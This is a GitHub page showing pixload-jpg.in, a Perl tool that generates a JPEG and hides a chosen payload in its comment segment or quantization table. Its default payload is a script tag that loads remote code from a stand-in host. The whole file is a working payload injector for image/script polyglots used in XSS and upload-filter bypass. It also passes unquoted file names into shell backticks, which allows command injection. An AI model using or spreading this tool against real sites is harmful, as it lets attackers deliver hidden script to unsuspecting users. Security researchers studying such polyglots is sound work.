-
Notifications
You must be signed in to change notification settings - Fork 239
/
pixload-jpg.in
160 lines (124 loc) · 4.77 KB
/
pixload-jpg.in
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
#!/usr/bin/env perl
#
# JPEG Payload Creator/Injector
#
# coded by sighook <alexandr.savca89@gmail.com>
#
# See LICENSE file for copyright and license details.
#
use strict;
use warnings;
use feature 'say';
use POSIX;
use Getopt::Long qw(:config no_ignore_case);
use File::Basename;
use constant PROGRAM => basename $0;
use constant VERSION => '@VERSION@';
use Image::ExifTool ':Public';
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Default options #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
my %opts = (
section => 'COM',
payload => '<script src=//example.com></script>',
);
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Subroutines #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
sub create_jpg {
say "[>] Generating output file";
sysopen my $fh, $opts{FILE}, O_CREAT|O_WRONLY;
syswrite $fh, "\xff\xd8"; # SOI
syswrite $fh, "\xff\xdb"; # DQT
syswrite $fh, pack('S>', 67); # DQT SIZE
syswrite $fh, "\x00" . "\x01" x 64; # DQT DATA
syswrite $fh, "\xff\xc2"; # SOF
syswrite $fh, "\x00\x0b"; # SOF SIZE
syswrite $fh, "\x08\x00\x01\x00\x01\x01\x01\x11\x00"; # SOF DATA
syswrite $fh, "\xff\xc4"; # DHT
syswrite $fh, "\x00\x14"; # DHT SIZE
syswrite $fh, "\x00\x01\x00\x00\x00\x00\x00\x00\x00". # DHT DATA
"\x00\x00\x00\x00\x00\x00\x00\x00\x03";
syswrite $fh, "\xff\xda"; # SOS
syswrite $fh, "\x00\x08"; # SOS SIZE
syswrite $fh, "\x01\x01\x00\x00\x00\x01\x3f"; # SOS DATA
syswrite $fh, "\xff\xd9"; # EOI
close $fh;
say "[✔] File saved to: $opts{FILE}\n";
}
sub inject_payload_com {
say "[>] Injecting payload into COMMENT";
my $exifTool = Image::ExifTool->new;
$exifTool->SetNewValue('Comment', $opts{payload})
or die "[✘] Fail to SetNewValue\n";
$exifTool->WriteInfo($opts{FILE})
or die "[✘] Fail to WriteInfo\n";
say "[✔] Payload was injected successfully\n";
}
sub inject_payload_dqt {
say "[>] Injecting payload into DQT table";
my $payload_len = length $opts{payload};
sysopen my $fh, $opts{FILE}, O_WRONLY;
sysseek $fh, (7 + (64 - $payload_len)), SEEK_SET;
syswrite $fh, $opts{payload};
close $fh;
say "[✔] Payload was injected succesfully\n";
}
sub banner {
<<EOF;
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
EOF
}
sub usage {
<<"EOF";
Usage: @{[ PROGRAM ]} [OPTION]... FILE
Hide Payload/Malicious Code in JPEG images.
Mandatory arguments to long options are mandatory for short options too.
-S, --section COM|DQT set section for payload injection
-P, --payload STRING set payload for injection
-v, --version print version and exit
-h, --help print help and exit
If the output FILE already exists, then payload will be injected into this
existing file. Otherwise, the new one will be created.
EOF
}
sub version {
PROGRAM . " " . VERSION;
}
sub main {
# command-line options
GetOptions(
'h|help!' => \$opts{help},
'v|version!' => \$opts{version},
'S|section=s' => \$opts{section},
'P|payload=s' => \$opts{payload},
) or die "$!\n";
$opts{FILE} = shift @ARGV;
say &usage and exit(0) if $opts{help};
say &version and exit(0) if $opts{version};
say &usage and exit(1) if ! $opts{FILE};
say &banner;
&create_jpg if ! -f $opts{FILE};
if (uc $opts{section} eq 'COM') {
&create_jpg if ! -f $opts{FILE};
&inject_payload_com;
}
elsif (uc $opts{section} eq 'DQT') {
die "The payload size must not exceed 64 bytes!\n"
if length($opts{payload}) > 64;
&create_jpg; # FIXME: overwrites file content
&inject_payload_dqt;
}
else {
die "-s, --section option argument must be COM or DQT!\n";
}
if (-f '/usr/bin/file' ) { say `file $opts{FILE}` }
if (-f '/usr/bin/hexdump') { say `hexdump -C $opts{FILE}` }
elsif (-f '/usr/bin/xxd' ) { say `xxd $opts{FILE}` }
}
&main;
# vim:sw=4:ts=4:sts=4:et:cc=80
# End of file.